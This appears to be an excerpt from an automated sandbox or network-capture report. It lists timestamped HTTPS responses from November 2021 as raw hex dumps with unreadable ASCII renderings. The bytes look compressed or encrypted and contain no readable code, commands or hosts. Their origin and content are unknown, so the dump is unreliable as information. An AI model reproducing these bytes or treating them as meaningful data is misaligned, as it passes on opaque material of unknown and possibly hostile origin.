                                                                                                                                                                                2021-11-11 11:26:04 UTC651INData Raw: fa 17 ff 29 f6 12 b0 98 a9 ea bb f2 2d c0 be ee 40 95 14 96 43 c2 25 e7 66 1b bf 5e 7e 69 64 82 3c 09 02 4f 56 46 ec ef f0 ea 31 c6 b7 7b 5f 16 f3 be 38 cd 0a 9d 94 46 5f bf be 2d 1b 2b 12 d9 a2 86 80 01 c6 31 ff bb b7 71 c2 69 de eb 93 e0 fe c9 11 36 4b 02 2d 1b 71 83 58 cb 46 5e e0 ca 28 7e f9 2c 41 d1 c9 13 f7 28 8b 6c 27 db 18 12 29 d7 97 9a 97 ff d8 9e 4a be fa 29 42 60 a4 01 05 b9 ff be 15 0a e7 02 4c 48 6b e1 96 f6 70 f2 4e 04 8a e9 25 40 d1 6e c9 5e c9 5a 57 59 06 a5 de 19 50 0f b6 5f 13 c4 bc ad be d2 ad 3e d6 bc 53 f2 2b 7d 85 87 b9 bf 8b e0 45 28 6f 09 e3 ee 5f d9 4a 4b f4 4d 26 db 72 dc 39 69 8c 94 1e 21 27 ce 05 75 16 89 96 e8 60 30 e6 7b 4a 12 3e 29 d6 fa 64 71 be ec 1f 27 cf d5 45 99 25 6a 8c 75 c5 6b 20 53 5f 01 eb 65 ac fe 32 27 d7 de 49
                                                                                                                                                                                Data Ascii: )-@C%f^~id<OVF1{_8F_-+1qi6K-qXF^(~,A(l')J)B`LHkpN%@n^ZWYP_>S+}E(o_JKM&r9i!'u`0{J>)dq'E%juk S_e2'I
                                                                                                                                                                                2021-11-11 11:26:04 UTC667INData Raw: 5c 38 dc 0f 75 17 9e ca 72 ea c8 70 e3 16 90 6a fc 86 eb 29 08 e5 aa 4a 79 40 2a 64 f7 9c 9c cd 80 87 46 93 9a e1 c4 e4 03 c0 aa df bb d4 5b c6 07 d3 34 2f 32 7a 30 66 6f 72 63 73 65 35 75 6e 99 ba 28 77 fc 80 d3 11 70 16 84 00 49 23 6a a7 95 c0 81 dd e6 9e 02 f5 dc 2f c3 87 75 40 5f 1e 2d 70 11 1c 1b cb 43 01 42 05 ca 49 b7 d7 3b 20 68 61 dc 6e c4 4e 40 92 c8 8e 3d 7f 92 17 97 e5 4d 81 27 df 55 81 48 9c d2 dc 99 70 c9 3f 78 25 7e 08 04 23 b2 09 b1 58 5c 51 f2 7f 40 6c c0 82 66 17 84 0d 18 01 c6 db 01 d2 7b 3a 15 78 25 1e a6 70 2d fd 38 79 5d ab 20 42 7d 61 8b 61 9a 70 03 c0 9b b0 30 17 21 84 87 98 4d 04 19 30 bd d9 60 18 b8 90 25 1f fe ff f3 0a 2e a1 82 00 85 5e f8 b0 48 a0 0b eb 79 39 8a c1 69 5c 8c 4c 54 86 08 38 f8 74 61 76 48 b6 f0 5b c0 4b 82 c0 2c
                                                                                                                                                                                Data Ascii: \8urpj)Jy@*dF[4/2z0forcse5un(wpI#j/u@_-pCBI; hanN@=M'UHp?x%~#X\Q@lf{:x%p-8y] B}aap0!M0`%.^Hy9i\LT8tavH[K,
                                                                                                                                                                                2021-11-11 11:26:04 UTC683INData Raw: a7 01 60 03 09 ce 03 07 06 05 2e 56 0a 71 fa 27 01 f1 6a e9 5d 94 04 a0 a8 be 0a 95 45 7c 22 74 ac 34 be 15 12 be fa ca 69 48 0a c4 29 c9 c1 54 8b 1a 7a 36 7d 8c f0 e1 93 55 bc 5e e3 30 c4 31 ff a8 0b de 93 16 ca dc 7a 04 ff e3 cd d4 f2 ff 09 87 d8 fe d9 46 d5 19 00 05 be 88 e7 16 0a e5 70 1c d0 8b 4c 44 2f c7 b1 ae dd d7 7e 43 a1 2b b7 17 80 d2 73 b3 63 f6 1c fd fa b8 ac 10 fb c2 71 cf 20 c4 a6 9d 9f 3b 28 9a cc 87 0c fb 1e 17 33 28 92 58 b7 b9 00 91 bd e4 7b 6d df f6 4e ff af c8 b9 03 31 ec 0e 54 fb 4e c0 f4 1e 70 97 07 1f b1 8a fd 0c 01 71 d1 43 c0 11 8f c4 24 63 a6 80 84 a0 c7 48 00 1b 1c b3 ca b1 81 c0 e9 f6 f3 70 15 eb c1 8f ff 86 34 bf 72 d8 12 2b fb 10 af cd 57 ad 08 f6 d1 1b 05 28 0c 80 33 20 0f 46 85 30 69 dc 14 aa 45 70 90 1f 0e 93 3a 7b 5e 09
                                                                                                                                                                                Data Ascii: `.Vq'j]E|"t4iH)Tz6}U^01zFpLD/~C+scq ;(3(X{mN1TNpqC$cHp4r+W(3 F0iEp:{^
                                                                                                                                                                                2021-11-11 11:26:04 UTC699INData Raw: 8d 12 52 11 02 aa 89 92 7f e4 9d 40 9f 9e 2a 4b 26 b2 b4 82 01 de 31 d7 a4 2a 6d 09 2e e5 7f 21 4f 92 e3 a8 b9 b4 60 84 f2 08 1b 34 e5 57 94 bf a2 52 90 83 53 12 97 32 ae ef 5f de 2e 72 28 40 b1 69 58 66 d3 28 ff 2c 65 fb fa e7 97 59 b8 e9 d9 3c a7 e6 3b 27 ef 1c 94 58 97 58 75 b4 58 52 f5 6c a7 13 db 21 d8 e0 18 31 17 d7 35 1f f2 54 90 9b da 94 66 b0 24 25 20 38 c4 c2 a3 c4 27 01 f7 9a 7b f5 b9 48 c2 7b f8 94 a4 f8 de 8b 0d 57 16 95 4e 33 f1 94 e9 c9 6f 8b e3 5b e8 87 f2 e7 f5 45 a3 0f 89 f2 75 28 4a ae 29 d3 2e 35 83 90 86 2b 7b 14 25 3c 3d c6 1b 2f 89 f7 6e 05 04 31 c8 66 01 37 bd 44 c9 08 d1 8b 60 b9 ed a1 8f 62 0d 1e 05 47 7e 69 72 42 62 e4 c7 86 bb 03 66 35 b9 5f 01 0a 93 e8 c6 36 3c bb 21 af ee fd 13 d7 c9 06 9c 29 07 d3 ee 28 13 09 0b 3e 1b 1d 67
                                                                                                                                                                                Data Ascii: R@*K&1*m.!O`4WRS2_.r(@iXf(,eY<;'XXuXRl!15Tf$% 8'{H{WN3o[Eu(J).5+{%<=/n1f7D`bG~irBbf5_6<!)(>g
                                                                                                                                                                                2021-11-11 11:26:04 UTC715INData Raw: f8 0f b6 56 31 5d 12 2b 33 be 77 3e a4 37 ae dc b7 21 5b 31 fc 5d b0 33 1a c6 50 10 0e 79 88 01 37 b5 5b ed 0b 29 30 75 c5 2c b5 94 ac 07 13 c3 79 a6 3d 7e 4e d0 fb 34 e7 69 d1 6c 8f d2 ff a4 26 9d 16 d3 08 9c ae 2a 53 4a eb 8b 7b 4a ef 8e 36 89 0b 5e 00 7b 21 3d 62 a5 77 e5 14 4f 30 a5 01 b5 83 1e 4e 57 3f ca 70 5b f8 b7 b0 d3 8b 33 8d 13 01 a3 30 43 12 7e f4 ff 00 e6 9f 40 b0 cd 57 17 a0 0e 76 a8 be 4e 1e 00 26 f4 ff 8f 7f 91 12 bd 66 47 00 df df 3d be 16 de 1c 19 0f af d6 bf ff 41 c3 27 63 3a 7f 87 0c 18 e3 f1 c1 a1 be 4d 71 3b d2 82 14 4e d8 02 68 f2 80 e4 bc ce dc 14 1d 8d 6e 26 c0 cb f6 bf ac 40 2e b4 38 5a fd 14 f2 95 a9 d6 7f 79 15 cc 06 3e a3 e0 41 50 90 6b f9 9c c4 ce 9c ba 71 17 03 3b 70 8b 4e 17 b1 22 0b d9 e3 a4 2e f1 e4 3a b6 fb d0 c2 4a 22
                                                                                                                                                                                Data Ascii: V1]+3w>7![1]3Py7[)0u,y=~N4il&*SJ{J6^{!=bwO0NW?p[30C~@WvN&fG=A'c:Mq;Nhn&@.8Zy>APkq;pN".:J"
                                                                                                                                                                                2021-11-11 11:26:04 UTC731INData Raw: 57 b1 a6 ee 2f fb 72 45 e7 59 03 62 28 0e 89 c5 f1 c9 bf a7 40 9b d5 fd a3 a4 4f 34 cb ba 99 89 6f f1 47 6c 43 b7 d4 c8 ab f6 16 2f 21 89 84 55 c6 6a 5f 08 8a 6d 16 ea 20 2d bb 2a b8 75 25 e2 de 08 52 42 f7 57 8a 20 28 27 fe ba 72 71 7e 09 03 18 66 e4 90 29 9f 5f b2 4c 46 62 5a 05 fc 82 b4 af c2 4d ce 12 57 54 33 c8 84 6e 4b fe dc d5 26 a2 e4 e2 b4 0a 31 5a da f3 cf 04 21 c2 01 d9 be 34 54 f8 f4 12 f2 24 e9 61 a5 ea 0b 24 e2 f9 bd 62 c3 04 22 21 ce ab 51 75 6a f0 1a ac 7c f8 58 55 bd 7b 36 02 8c 2b 6c 04 7c 11 64 48 75 d0 05 e2 e7 e9 c3 cc b0 17 86 00 6f a4 19 a1 39 4d 3d 77 01 ea a5 26 d7 21 54 6a 40 40 6f 7c 10 5b 28 bb 79 b6 7e e8 70 d6 fb 13 8e 7c 9b 06 85 91 33 20 03 57 b8 3a 88 10 61 07 01 e8 3a ee 6a dc 5b ec 0a 22 31 b4 6f 27 d7 3a 64 5f f6 33 ce
                                                                                                                                                                                Data Ascii: W/rEYb(@O4oGlC/!Uj_m -*u%RBW ('rq~f)_LFbZMWT3nK&1Z!4T$a$b"!Quj|XU{6+l|dHuo9M=w&!Tj@@o|[(y~p|3 W:a:j["1o':d_3
                                                                                                                                                                                2021-11-11 11:26:04 UTC747INData Raw: c2 21 cf ab 38 7c 9d af 55 94 3c b5 72 ba 9d bb 38 4a 94 f2 61 92 aa 97 67 e5 36 01 80 9d d2 08 9c 6a 99 ab 44 e2 cb 74 38 b9 4e 29 f6 2a c5 80 ca d9 4a fb 72 0e ef fd 71 c0 92 b8 2d 7b 20 2e d3 1f 5a 7d 2b 17 e6 fe 8a e1 16 8b 3f 84 b0 af 28 a6 f6 53 1c b6 25 08 d9 9e 49 5d 1a 77 ff d1 26 94 49 11 16 cb 01 cc 4d ef 9f 96 d3 9f c1 20 c7 2f ac a3 a1 21 c3 71 75 a5 ac 74 c8 e8 d8 42 89 f6 fc 46 25 7c 18 65 13 f2 a1 9f a5 d6 a7 c9 e4 63 5a b0 c2 21 40 4e d0 44 26 30 5f 06 ba 29 a8 6e a8 d4 d6 32 3f 3f d8 33 58 e6 8f b4 a3 1a 4a a0 2f eb 97 f5 b2 39 5e cd c5 ea bf 0b 9e f1 54 6c 58 2b 3a 2d 89 db 73 7d 01 ef 5a 8b 25 35 2a c1 23 cb 20 37 46 25 33 79 e6 42 ba 0a db bd 8b 01 fb 0b cb 75 45 f6 a5 65 61 25 02 74 eb 1c fc a0 51 10 96 8f e7 eb ca 24 5f ca 20 5f 25
                                                                                                                                                                                Data Ascii: !8|U<r8Jag6jDt8N)*Jrq-{ .Z}+?(S%I]w&IM /!qutBF%|ecZ!@ND&0_)n2??3XJ/9^TlX+:-s}Z%5*# 7F%3yBuEea%tQ$_ _%
                                                                                                                                                                                2021-11-11 11:26:04 UTC763INData Raw: cb 54 d3 27 e5 02 14 f7 c7 4e bf 75 96 a2 2b 41 c5 78 8c a2 71 11 3f 2b f8 3a 2d 35 75 3a c9 55 70 e0 b7 d6 13 45 37 ea f3 2f 09 ef bb 01 c5 db 2c 20 0b c7 33 c5 7b 2e 96 6b 59 41 00 31 f2 2b 37 29 c3 95 1a b9 7d eb 3a e2 d2 de 52 62 01 f8 7f 4c dd 2a c7 22 4b d2 83 ac 2b 8b bb 71 26 c9 57 d9 cf 41 31 f8 2d 41 07 29 c8 97 53 d2 be 64 68 ab c6 aa 26 9f 94 fe b0 af 95 65 01 27 f1 49 a5 58 b1 c0 54 27 df c5 8f 19 f0 c3 b5 ba 30 d9 1a 17 0d cd 1d 72 9f 27 c8 d0 87 99 c7 67 21 cb d9 18 af 78 ee f6 fe b5 f6 ff c9 d7 1e 14 b7 9b 2f 82 08 57 b9 26 3f 6a b8 e2 df a6 de cb 7d 99 f5 1f 76 7e 4f e1 56 7e 28 15 ef 2f 31 d2 31 3d ca 7b b8 5f a1 ce 1f 4b e9 17 21 ca 52 8f 29 08 05 84 fa f2 e9 97 ab 8c a4 ee 3d 29 f1 25 ef 96 bd ae bf 9f 98 52 e9 ba bd 65 61 89 31 ca 46
                                                                                                                                                                                Data Ascii: T'Nu+Axq?+:-5u:UpE7/, 3{.kYA1+7)}:RbL*"K+q&WA1-A)Sdh&e'IXT'0r'g!x/W&?j}v~OV~(/11={_K!R)=)%Rea1F
                                                                                                                                                                                2021-11-11 11:26:04 UTC779INData Raw: da b5 d9 12 98 aa 8e 5b 4f 24 18 af ad 00 97 f8 b3 27 e2 b8 93 99 fc 80 2d a1 c0 a0 aa be 86 7c 6f 5a c1 b8 5f b1 e2 ff c6 20 66 fe a5 47 3e 6c ba 00 fc 20 17 72 6f d8 06 9d 66 ab 4c 33 23 b7 e5 f9 49 9e d7 57 33 e1 d1 39 11 49 0a e1 0f 2a af 64 1c a8 1b c4 c2 1c 5f 13 eb a2 ec c8 ba 48 eb 2c c1 e9 89 64 31 1b ca 7a d9 8b 33 9b 7d b5 de b8 c4 e7 d9 98 23 c8 13 09 fe 61 ca 01 d6 2b 62 31 1f 6c 6f 97 d6 36 6b 28 29 8c 1f e2 65 6e 39 f3 75 7f ff a5 af 2c 0b bf bd 39 74 33 62 39 d7 ac d0 c9 ee f7 18 c9 31 1f b5 f2 10 95 91 87 ba 32 de c4 21 c6 be 32 93 35 71 8c 48 3a 40 27 b1 95 02 5a 7b e3 4a 4e c5 c6 a9 4a d3 13 bc dc 17 31 12 d8 35 1c ed a2 d2 bf 49 6d db 85 52 1c 8a 3c 24 35 16 c9 30 e6 5c c9 34 ec 4e 7a ee fc 41 b5 fb 62 fb e6 57 fe 4b 52 dd 98 86 66 01
                                                                                                                                                                                Data Ascii: [O$'-|oZ_ fG>l rofL3#IW39I*d_H,d1z3}#a+b1lo6k()en9u,9t3b912!25qH:@'Z{JNJ15ImR<$50\4NzAbWKRf
                                                                                                                                                                                2021-11-11 11:26:04 UTC795INData Raw: 98 82 ea 21 f4 29 4a de b6 e4 2a b9 5e 98 e1 25 f1 24 c5 f6 25 50 f2 b1 1e 49 dd a4 08 20 f7 23 40 f5 29 74 f1 e1 3e ab 3d ff 2f 21 fc 05 15 3c e7 a1 31 f1 45 be ae 9d f8 ef c1 c6 20 7f 29 21 64 13 cf 95 f1 ef cb 44 e7 f4 03 4a be 8a 95 25 31 7c 0d af c5 91 2f 58 a1 82 93 df 8b 31 fd 96 1c bd f4 90 62 09 07 8b 2e ff 9c ec 8a 1f f7 ad 57 96 2c 49 a1 f6 20 7b 29 2d 7b cc 25 31 90 8c 5a c2 ac f6 c4 8b 02 ea 82 78 ee 57 d1 c2 6e b2 8d c5 7e f3 b0 16 31 f7 a3 23 12 01 d7 46 5f df 89 de 74 f3 5e ef d9 99 72 96 12 09 f1 bf f2 b5 84 29 fe ee 9d bb 9c bc 21 a7 77 cc 00 25 e3 1c 14 54 3f 29 d3 5a a5 67 6a 8b 5c 5a b1 27 3a 76 9a e2 8b 7d 42 ac 21 27 03 c5 07 04 0f b6 06 bb e4 47 21 4e db bb 8d ca 6a 84 1c fe dd 42 4e 09 13 29 d1 00 1c e2 cd ee f9 22 4f be f8 38 a5
                                                                                                                                                                                Data Ascii: !)J*^%$%PI #@)t>=/!<1E )!dDJ%1|/X1b.W,I {)-{%1ZxWn~1#F_t^r)!w%T?)Zgj\Z':v}B!'G!NjBN)"O8
                                                                                                                                                                                2021-11-11 11:26:04 UTC811INData Raw: e3 52 e6 b0 9f 78 a8 9d 1a de 0b ba 9a 0e 55 e1 b4 c9 f6 de ef 50 89 ce b5 f8 37 04 bb fa c6 53 24 8a 33 4f b9 cb 4f a6 4c 2d e3 55 16 6b 5a fa 62 2f cf 98 c7 d7 8b 4e 36 21 1c 31 f7 3a e7 c5 27 06 42 44 57 14 d4 b6 78 6b df 6c 5a 9d d1 c9 69 66 45 9f 73 76 2f ea 32 ff 14 e7 84 20 b5 99 24 fb 3e 30 53 2b 02 29 3d db 31 4e 8d 02 7b f5 f4 7f 53 5b ea f2 b6 92 bf 62 dc eb ff d1 5d 65 e3 4d 51 e9 50 2c ed d3 e9 2f c1 53 03 58 57 3e ea 72 30 f3 ae 4e d2 ba a3 11 4b c9 ae 7a a4 21 12 9f 79 67 ac 41 39 2b d6 c8 1d 89 a5 e6 28 b0 ff 16 77 54 70 fb 85 cd e2 36 92 ba 75 48 f8 df cb f9 5f 33 6a fd 0b 0d f2 5d 24 ad fe ff cd e7 44 1a a0 5d da 9d 18 62 21 c0 bf 42 34 71 0c af 5d 02 1a 25 40 66 49 b4 56 6b de 45 0a 8d dd 8f 2f d5 14 8d 2f 09 d8 7e ad 0e ce 29 cb be 57
                                                                                                                                                                                Data Ascii: RxUP7S$3OOL-UkZb/N6!1:'BDWxklZifEsv/2 $>0S+)=1N{S[b]eMQP,/SXW>r0NKz!ygA9+(wTp6uH_3j]$D]b!B4q]%@fIVkE//~)W
                                                                                                                                                                                2021-11-11 11:26:04 UTC827INData Raw: e9 be d2 57 1f d6 a6 50 66 01 5f 19 72 8f 10 55 6c 86 79 09 97 7d 94 b2 09 4d 32 49 50 73 a5 91 04 16 21 db 85 5b b5 82 6a e8 57 b6 d9 9f 4c 60 aa 54 fc 1f 6b 7e 80 ad 59 11 6f 7c 38 5a bb 75 ab bf 8b 6f 47 90 3b f8 2f df 19 a1 29 20 ec f6 4f 05 35 89 e2 31 77 13 eb c5 a3 34 e3 4f 05 01 d4 cd 27 bf e5 7c 25 d0 3e 7e f9 97 e5 7f 85 ff 33 b8 ee 8a d6 5e 62 4a d3 55 53 ae a4 08 62 21 d8 7d 59 b0 68 43 49 fd c9 29 08 32 80 c5 e7 04 8b cb 4b 17 17 b1 19 0b a8 43 bf 5f b8 38 2d 29 45 43 09 89 c0 dd 14 37 4b 03 a7 b3 16 31 ff 05 06 29 c7 31 f1 01 d7 2e e6 fe 4b c8 37 21 5a c7 98 8e ea b1 07 eb 92 ef 7d 73 cc 31 98 ce 40 2f 2d c2 2b 12 75 f7 d5 4b 84 89 39 82 6c 77 51 e8 7b 0b eb fa de 3f 62 09 d7 d7 59 76 92 d6 17 0d 19 df 34 f6 7e ac a6 c0 e9 21 f2 01 d2 95 5c
                                                                                                                                                                                Data Ascii: WPf_rUly}M2IPs![jWL`Tk~Yo|8ZuoG;/) O51w4O'|%>~3^bJUSb!}YhCI)2KC_8-)EC7K1)1.K7!Z}s1@/-+uK9lwQ{?bYv4~!\
                                                                                                                                                                                2021-11-11 11:26:04 UTC843INData Raw: fb 6d d2 7f 77 82 b4 7c 0e 9a eb f0 55 92 dd d5 46 75 e5 89 0d 9b 96 54 e8 61 d7 26 08 c1 97 3f c9 82 db 87 e8 61 4c 26 0c c2 0f dc 10 27 b7 4c 31 26 7a f2 22 3b 0b 9f 80 b6 01 ea 3f 0c 01 b6 21 83 fb ff 0f ab 87 5c 7a 25 ec 8d 24 81 44 40 b6 4c 64 78 8c 19 9d 51 68 d4 ed 82 08 96 a7 53 3b 6c ce 5e e9 aa 28 53 33 bb 26 30 5e 8a 42 2c 97 e5 fa 27 cc a1 4c 1a e4 4b fb da 45 c8 33 90 03 7a f3 3f 98 86 f9 e4 ea 9b ef 26 ec 2f f6 9a d2 fd 4c ab 4b f0 99 59 7a 98 e8 1a bf d1 eb 6d be 89 3a 35 04 7e 2e 65 e7 b8 78 b1 bf 01 11 2b 19 de 7b 2d 90 b8 84 ee 28 40 33 19 89 d8 0d 5a 24 30 4e de 21 d0 93 c4 89 ce 04 74 58 53 4f 18 64 4e 92 55 1a 58 18 b1 6f 64 c6 e8 77 d6 82 87 fe e6 06 b2 23 7a 30 09 c6 11 37 be 5f 79 08 45 e8 ae b3 a1 21 f1 0b 09 d7 9a 79 c4 75 9c 01
                                                                                                                                                                                Data Ascii: mw|UFuTa&?aL&'L1&z";?!\z%$D@LdxQhS;l^(S3&0^B,'LKE3z?&/LKYzm:5~.ex+{-(@3Z$0N!tXSOdNUXodw#z07_yE!yu
                                                                                                                                                                                2021-11-11 11:26:04 UTC859INData Raw: 71 e9 c4 e6 ef e8 1f df 91 ff 4a f3 5c 48 9b 2d 1f 58 26 94 82 e4 01 ef f3 02 5f c2 d9 f6 7d d9 69 4a c2 a5 1c 81 91 da af c1 93 ff 2f eb 31 f1 36 21 e9 b9 66 0f 4e b7 87 5b f1 61 6b 65 9a be 2d c1 f9 1e 2e 62 0d cf db 40 91 3b 58 b2 4a fa 98 89 0f 97 14 44 27 21 c7 7b 01 16 46 61 64 e7 04 68 bd b2 cf ab 72 f5 c6 55 93 a5 2f 82 e5 bf 01 f9 c8 4f 49 e9 79 a7 af a4 f6 0f e8 02 a7 e9 66 3c 82 b3 57 6d c6 bb a6 30 b4 52 b0 1a b0 43 9f c2 1e d5 09 5e 59 bb e4 26 44 09 f7 bc 43 c4 08 03 ba d7 3a e4 d7 ea ad 73 84 05 a1 a2 11 93 c4 e4 e9 d2 9c df f2 13 c1 e3 65 7d 9d 3a 4c 62 c7 7b 95 27 fd 18 f4 e9 36 f2 2c 4d 0d 28 d5 a9 3c bb c8 bd e4 ae fc 68 b2 ea a8 17 41 8f 29 0f cb e1 fd 4e 69 1f 89 f3 c1 57 02 8d b9 31 46 7b 33 c7 8b e5 af 44 ea 31 db 9c ed ca 9f f6 66
                                                                                                                                                                                Data Ascii: qJ\H-X&_}iJ/16!fN[ake-.b@;XJD'!{FadhrU/OIyf<Wm0RC^Y&DC:se}:Lb{'6,M(<hA)NiW1F{3D1f
                                                                                                                                                                                2021-11-11 11:26:04 UTC875INData Raw: f8 13 9c b8 b7 3e 1d 4a 0c ca 54 2b 1d 1a 64 02 ad 38 97 aa 2d 1d 0a cc 6b e0 59 0d 6f 32 ab f6 88 47 c2 12 03 08 fb f2 12 e0 cb 8b 03 b5 de 87 f3 c2 19 45 63 0b 01 1f f0 fe 69 05 c5 00 72 0f 74 03 7a 8c 75 2c 7b e9 c9 27 52 77 9a e7 5d c0 88 57 bf 0b d8 a6 f8 7e 7e 07 1e 27 43 3f c1 ef 07 20 76 b5 09 ff 01 f9 5f 77 96 70 60 51 46 47 79 c8 7f 97 79 38 3a a7 0c 7f 65 ce 14 e9 8e 89 51 77 b2 e3 5d e5 4a 21 06 18 87 26 5c 50 c1 f0 b4 ea e9 3d 19 0b 38 3d 53 4b bc 57 e3 52 4e 35 f3 b2 12 cf 59 be 93 5e 54 33 19 50 45 51 ca 59 5f 47 dc 9c 8b a5 de 30 e4 14 1b 3c 64 43 74 e2 e8 fd cc 83 0c 87 68 14 df 87 a1 5a c6 83 0c 83 51 be e8 26 e9 ac 84 a1 3e 4c 4e e9 37 ea fe 22 51 22 eb 07 c0 d4 27 25 6f be 55 96 ae 25 29 f1 51 65 6e 09 04 4e 55 4e be b6 fd 1e 09 f6 ae
                                                                                                                                                                                Data Ascii: >JT+d8-kYo2GEcirtzu,{'Rw]W~~'C? v_wp`QFGyy8:eQw]J!&\P=8=SKWRN5Y^T3PEQY_G0<dCthZQ&>LN7"Q"'%oU%)QenNUN
                                                                                                                                                                                2021-11-11 11:26:04 UTC891INData Raw: ca ae 5d 87 9f 13 20 e6 b4 26 e9 d0 c4 25 ab f2 68 84 05 1f b8 49 a1 89 f1 20 c6 8c 1f 8e 34 0e 8a f3 20 b4 52 f5 d3 4c 09 31 c9 ff c7 47 3f 2d 3b 7e 7a 7b 5f 44 e2 1c d2 a1 d0 4c 14 09 f3 dd 0a 2a 28 aa 89 4b fe e8 59 5f 13 6f f6 a1 69 67 f5 04 b5 f1 ab e2 57 89 e8 59 60 89 21 c9 79 c4 8b c1 40 14 2e 91 24 a6 bd 17 8b 74 c0 bb d8 7f 05 58 02 37 b1 c1 04 2b 29 5e 6a b5 08 af 20 de f4 71 e6 6e 8a 47 5a ad 1a 5b e8 c3 a2 67 5b ee 25 5a 8d 48 20 7d b1 c6 06 3e a9 ea 93 25 70 ff 9a e6 5a a3 ed 25 be 32 ad 55 76 08 52 e4 b9 90 45 b7 f0 26 12 ef 01 fb eb a3 bb 96 35 dc 12 8d 0b 0b ba 57 c5 78 27 18 1e 31 f2 bb a5 02 21 cb 29 da 77 6e e6 be d7 60 01 ee 09 fa 97 89 59 73 e5 a4 c5 69 57 c6 0d 5b 36 ac fd df 52 ba 72 2c e7 77 d1 ae 62 29 ff 74 f9 10 0a 8b c7 e4 6a
                                                                                                                                                                                Data Ascii: ] &%hI 4 RL1G?-;~z{_DL*(KY_oigWY`!y@.$tX7+)^j qnGZ[g[%ZH }>%pZ%2UvRE&5Wx'1!)wn`YsiW[6Rr,wb)tj
                                                                                                                                                                                2021-11-11 11:26:04 UTC907INData Raw: 01 cd fc e7 96 30 f9 03 00 e9 bd 14 75 e8 4e e0 f8 a4 46 d5 92 8c da 1f a5 fe 12 33 fb ce 42 52 12 89 1a 57 d1 80 40 b2 ac 2e 79 9d 54 a3 59 42 2e bc 24 94 7d e2 1a 73 a3 25 75 a1 0e e2 8c 01 fb b1 f7 18 3b e2 8c b3 08 87 08 d4 70 06 e1 19 2f ae 76 48 a5 aa bb 77 45 c8 a7 55 96 b4 97 c5 6d 26 8c 02 ba fb 3f 2b b0 0e 01 0b 97 96 20 13 c8 8b 38 8f 91 21 02 13 03 bb 3c 39 66 c3 11 71 3c 08 1f b1 27 a3 00 e8 83 ef ff 15 cc 38 05 4e 12 93 7a 40 27 8a de 4b f2 6f c0 30 fa b7 55 db 2d 12 67 75 42 0e 66 3f 01 7a 7e f3 ff 83 24 37 01 e7 fa 0e 0c 42 8e 98 07 d7 bd b2 58 06 5d 76 bb d6 10 71 15 ef fc 27 e0 ed 48 34 ca 00 53 e6 09 3f 71 37 42 39 ff f5 00 85 9a d2 ca 49 7d b1 5e 15 bf 20 16 a8 44 31 06 1e 9c 3b a9 60 e8 00 f5 ad 2f d6 28 63 f4 75 c0 30 dd 3d ed ff 60
                                                                                                                                                                                Data Ascii: 0uNF3BRW@.yTYB.$}s%u;p/vHwEUm&?+ 8!<9fq<'8Nz@'Ko0U-guBf?z~$7BX]vq'H4S?q7B9I}^ D1;`/(cu0=`
                                                                                                                                                                                2021-11-11 11:26:04 UTC923INData Raw: 20 07 31 4e db a0 b8 f6 9d c5 78 2f 7d 32 0d 5f f0 67 9c cb 69 d7 ec 86 d2 6a dc 63 8b b4 04 c9 f6 0e 16 0a f2 22 96 89 de 7f e6 fb 2d c1 f4 ae 6a 5f 92 b8 35 02 09 78 ce 54 f6 72 71 e1 89 21 fb 12 35 57 71 4a c2 03 3e 40 d5 7d 06 e5 42 b9 f3 91 28 b9 51 20 e1 24 5d 26 7f 30 6d 29 3e be 9f d1 ac c9 5d 45 c6 a5 89 b6 55 b1 3d c6 e1 e6 6a a3 08 96 a3 c9 28 f1 12 90 e7 b5 73 63 2c ab 15 b8 10 2d f7 3a 2a 5d b0 d6 cf 1c b1 d6 42 21 c8 7f 84 e3 f6 64 e1 95 39 0c c5 8b 13 ae 65 83 aa 14 3a af e4 ea d4 49 fb e7 2e ce 0a 1c 23 2e 2e 54 42 15 93 ef 74 2a 64 48 ec a6 a3 3f 92 36 d5 39 1e 1f 7c c9 d2 ff f3 25 75 bd 47 4c a7 ec 4b d2 14 02 c6 50 0b 27 d6 a1 2d fb b6 ac b2 e9 f7 be 9c c5 45 01 e8 23 34 5f ba 26 92 33 d1 f8 ac 65 2f 39 08 29 ea 55 d3 1e 81 36 bb 53 39
                                                                                                                                                                                Data Ascii: 1Nx/}2_gijc"-j_5xTrq!5WqJ>@}B(Q $]&0m)>]EU=j(sc,-:*]B!d9e:I.#..TBt*dH?69|%uGLKP'-E#4_&3e/9)U6S9
                                                                                                                                                                                2021-11-11 11:26:04 UTC939INData Raw: 4b 28 ca f2 17 01 d2 62 b1 8b 5d b1 6c 05 c6 56 73 58 ca 1f 95 b8 3a 8b 08 25 01 de 5f 22 1a c2 28 76 97 52 2b e3 45 83 ac 13 00 8f fb 73 33 e6 a4 02 46 bf 28 bd 0e 55 d4 fa e4 38 c4 ce bf a7 87 12 c2 71 b8 8c a1 21 c1 3a 0b af fb 55 64 46 b0 85 b4 fc 6b 57 c0 1e f3 80 97 94 10 9d e5 78 25 e5 9c a7 78 ea c9 2a f6 57 e5 6f 04 33 01 29 fa ec e4 4a dd 33 44 a5 af b2 a7 c6 29 06 1e 25 09 d2 7e cf e0 1d ca 18 44 93 b1 34 4a ea d8 95 c6 55 87 26 6a fd 65 96 4b b7 f7 df e5 c7 35 30 ab a0 3f b8 96 99 5a 77 6c 95 27 c6 40 16 4e 97 32 36 f5 9a 63 78 2e c5 60 21 c8 aa b6 ab 7a 4e c2 8d ef 2f b1 b6 ea 13 2d 38 35 5f 16 c9 27 c7 b8 ba 3c 98 5b 2b 0f 5b 31 ea 49 af 80 7c 3e 73 16 20 29 0f bf 77 02 c5 d6 dd f5 3a f6 c8 5f a8 dc a7 b0 2f bf dd e0 74 62 4a 0a 8b 95 5f a9
                                                                                                                                                                                Data Ascii: K(b]lVsX:%_"(vR+Es3F(U8q!:UdFkWx%x*Wo3)J3D)%~D4JU&jeK50?Zwl'@N26cx.`!zN/-85_'<[+[1I|>s )w:_/tbJ_
